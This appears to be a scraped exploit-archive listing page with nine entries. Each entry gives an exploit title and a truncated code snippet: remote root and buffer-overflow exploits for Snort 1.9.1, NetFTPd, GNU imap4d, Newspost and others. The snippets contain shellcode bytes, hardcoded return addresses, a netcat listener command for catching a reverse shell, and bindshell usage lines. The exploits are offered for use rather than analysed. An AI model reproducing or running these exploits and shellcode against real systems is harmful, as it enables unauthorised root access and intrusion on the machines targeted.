Snort <= 1.9.1 - Remote Root Exploit (p7snort191.sh)

No description provided by source. !/bin/sh p7snort191.sh by truff [email protected] Snort 1.9.1 and below remote exploit Tested on Slackware 8.0 with Snort 1.9.1 from sources Usage: 1/ Launch a listening netcat to listen for the shell nc -p 45295 -l 2/ p7snort119.sh yourIP RetAddr Where yourIP i...

Roger Wilco 1.4.1 - Remote Server Side Buffer Overrun Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/8566/info A vulnerability has been reported for various Roger Wilco server releases. The problem occurs server-side, and can be triggered when processing malformed client packets. Specifically, when connecting to a server...

htpasswd Apache 1.3.31 - Local Exploit

No description provided by source. !/usr/bin/perl Proof Of Concept exploit for htpasswd of Apache. Read the advisory for more information. - Luiz Fernando Camargo - foxtrotatflowsecurity.org $shellcode = \x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68...

GNU Mailutils imap4d 0.6 - Remote Format String Exploit (exec-shield)

No description provided by source. / Fedora Core 6 exec-shield based GNU imap4d mailutils-0.6 search remote format string exploit by Xpl017Elz Advanced exploitation in exec-shield Fedora Core case study URL: http://x82.inetcop.org/h0me/papers/FCexploit/FCexploit.txt Reference:...

NetFTPd 4.2.2 User Authentication Remote Buffer Overflow Exploit

No description provided by source. Net-ftpd 4.2.2 user autentication b0f exploit 0day coded by Sergio 'shadown' Alvarez import struct import socket import sys import time class warftpd: def initself, host, port: self.host = host self.port = port self.bsize = 512 self.ebpaddr = 0xcacacaca...

Power Daemon 2.0.2 - &#039;WHATIDO&#039; Remote Format String

/ gexp-powerd.c Power Daemon v2.0.2 Remote Format String Exploit Copyright C 2005 Gotfault Security Bug found and developed by: barros and xgc Original Reference: http://gotfault.net/research/exploit/gexp-powerd.c / include include include include include include include include include include...

Newspost 2.1 socket_getline() Remote Buffer Overflow Exploit v2

No description provided by source. / v0.2 Newspost "socketgetline" Buffer Overflow Exploit Exploit Bug discovered: 02/03/2005 cybertronicatgmxdotnet cybertronic @ newspost $ gcc -o newspostexpl newspostexpl.c cybertronic @ newspost $ ./newspostexpl cyber tronic Usage ----- Bindshell ./newspostexp...

AIX 5.1 5.3 - paginit Local Stack Overflow

AIX 5.1 5.3 - paginit Local Stack Overflow / exploit for /usr/bin/paginit tested on: AIX 5.2 if the exploit fails it's because the shellcode ends up at a different address. use dbx to check, and change RETADDR accordingly. cees-bart / define RETADDR 0x2ff22c90 char shellcode = "\x7c\xa5\x2a\x79"...

Mandrake Linux 8.2 /usr/mail local exploit (d86mail.pl)

Exploit for linux platform in category local exploits ======================================================= Mandrake Linux 8.2 /usr/mail local exploit d86mail.pl ======================================================= !/usr/bin/perl Mandrake 8.2 /usr/mail local exploit Usage: perl d86mail.pl...